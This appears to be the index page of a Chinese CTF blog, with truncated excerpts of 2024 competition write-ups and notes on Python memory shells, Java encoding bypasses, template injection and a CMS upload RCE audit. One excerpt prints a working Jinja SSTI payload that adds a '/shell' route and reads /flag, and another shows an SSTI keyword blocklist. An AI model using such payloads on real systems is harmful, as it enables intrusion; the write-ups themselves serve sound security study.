A day in AsaL1n

2024强网拟态 web 我们A1natas最后获得了第30 感觉没希望进线下了 尽力了 不过开心的是我ak了web方向的题目 ez_picker/register存在原型链污染 可以污染任意的黑白名单 这里在register的时候 进行了merge操作 写个简单的demo 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960import sanicfrom sanic import text, Sanic, Request, responsefrom key import secret_keyapp = Sanic("test")users=[]safe_modules = { 'math', 'datetime', 'json', 'collections'
...

一些python rce利用&&内存马 有的时候会遇到 能ssti注入或者直接执行任意命令了 但是不出网同时没有回显 这个时候需要进一步操作的时候就比较麻烦 python内存马也不是一个很常见的东西 所以今天想着学习一下能任意命令执行的利用手段和内存马 flaskstatic_folder 任意文件读取flask在初始化的时候 会设置很多内部的属性 1234567891011121314151617181920def __init__( self, import_name: str, static_url_path: str | None = None, static_folder: str | os.PathLike | None = "static", static_host: str | None = None, host_matching: bool = False, subdomain_matching: bool = False, ...

Java 编码绕过 上午台州市赛web做完闲逛的时候看到的 学习一下 UTF-8 Overlong Encodingutf-8可以将unicode的字符 通过某种计算转化成1-4位的字符 转化的逻辑如下 123456(十六进制) | （二进制）--------------------+---------------------------------------------0000 0000-0000 007F | 0xxxxxxx0000 0080-0000 07FF | 110xxxxx 10xxxxxx0000 0800-0000 FFFF | 1110xxxx 10xxxxxx 10xxxxxx0001 0000-0010 FFFF | 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx 这样 通过更长的编码长度 可以表示不同的字符 在java反序列化的过程中 也体现了这一点 在ObjectinputStream#readUTFSpan中会把buf中的内容解码出utf-8编码的字符 调用栈如下 可以看到这里写出了不同情况下的处理方式 一字节的字符 ...

2024SCTF 好多没复现 水一下罢了 比赛的时候就做出了两道题 哭（QAQ） ezRender在admin路由 存在ssti注入 但是这里要过一个waf和一个身份验证 先来看waf 123456789101112131415161718192021222324252627282930313233343536373839evilcode=[ "{%", "config", "session", "request", "self", "url_for", "current_app", "get_flashed_messages", "lipsum", "cycler", " ...

2024Bytectf 这次比赛 我们A1natas排名第17 可惜了没能进入决赛 就差一点 最近p事情太多了 又忙newstar又忙其他的 现在才有时间复现 写博客 ezobj（复现）给了源代码 1234567891011121314151617181920<?phpini_set("display_errors", "On");include_once("config.php");if (isset($_GET['so']) && isset($_GET['key'])) { if (is_numeric($_GET['so']) && $_GET['key'] === $secret) { array_map(function($file) { echo $file . "\n"; }, glob('/tmp/ ...

QL表达式注入依赖12345<dependency> <groupId>com.alibaba</groupId> <artifactId>QLExpress</artifactId> <version>3.3.2</version></dependency> 来自https://github.com/alibaba/QLExpress 使用123456789101112131415161718192021222324252627282930变量：使用$符号加上变量名的方式来引用变量，例如$age表示引用变量age的值。常量：支持整数、浮点数、字符串、布尔值、空值等常量类型，例如1、2.5、"hello"、true、null等。算术表达式：支持加减乘除、取余、取反等算术运算，例如1+2、3*4、-5等。逻辑表达式：支持与、或、非等逻辑运算，例如true && false、true || false、!true等。比较表达式：支持等于、不等于、大于、 ...

2024羊城杯 web这次比赛 在大家的努力下 我们A1natas最后排名第三 我也是成功的在晚上12点左右 侥幸ak了web 这次比赛被我非预期了好几题 笑死 Lyrics For You存在任意文件读取 可以读取config.key config.py等等 key的值是 1secret_code = "EnjoyThePlayTime123456" 存在pickle反序列化 直接伪造cookies就行 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768import osimport randomfrom flask import Flask, make_response, request, render_template# from cookie import set_cookie, cookie_check, get_cookieimport p ...

2024 巅峰极客初赛 web 感谢A1natas的小伙伴 这次我们A1natas 获得了第19名 决赛见 EncirclingGame签到 直接玩游戏就行 队友玩了会就穿了 GoldenHornKing贴一下payload 1lipsum.__globals__['__builtins__']['eval']("app.add_api_route('/shell',lambda:result ,methods=['GET'])",{'app':app,'result':lipsum.__globals__.get("os").popen("cat /flag").read()}) 源代码如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515 ...

beetl 模板注入学习依赖测试使用的依赖 12345678910<dependency> <groupId>com.ibeetl</groupId> <artifactId>beetl</artifactId> <version>3.0.11.RELEASE</version></dependency><dependency> <groupId>org.antlr</groupId> <artifactId>antlr4-runtime</artifactId> <version>4.7.2</version>//需要的引擎</dependency> 语法 主要还是参考官方文档 Beetl: Beetl3.0,模板引擎。从2010年开始研发开源 (gitee.com) 注意到这个 任意方法调用写一个demo看看是怎么阻止恶意方法调用的 12345678 ...

Prain清雨博客v1.3.0审计 某比赛里面出现的一道题目 赛时都花时间在做渗透上面了 今天抽出点时间来看看 路由 这个是一个极度轻量化的博客框架 所有的路由控制都在index.php这一个文件里面 首先调用他定义的get方法 这里我们访问的是/目录 为空 默认为index 使用$_SERVER[‘REQUEST_URI’]获取访问的路由 一系列的匹配之后 返回了XDEBUG_SESSION_START=18778这个值 后面就是一系列包含文件 检验安装的操作 然后进到switch里面 查询是否有匹配的路由 存在则反感会页面 否则返还404 比如index 访问/?index 这里显然不存在这个文件 返回空 后台插件rce漏洞该漏洞需要登录 漏洞点出现在?import路由 这个是一个上传主题的地方 这个博客允许上传自定义主题 123456789101112131415if(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION) == 's ...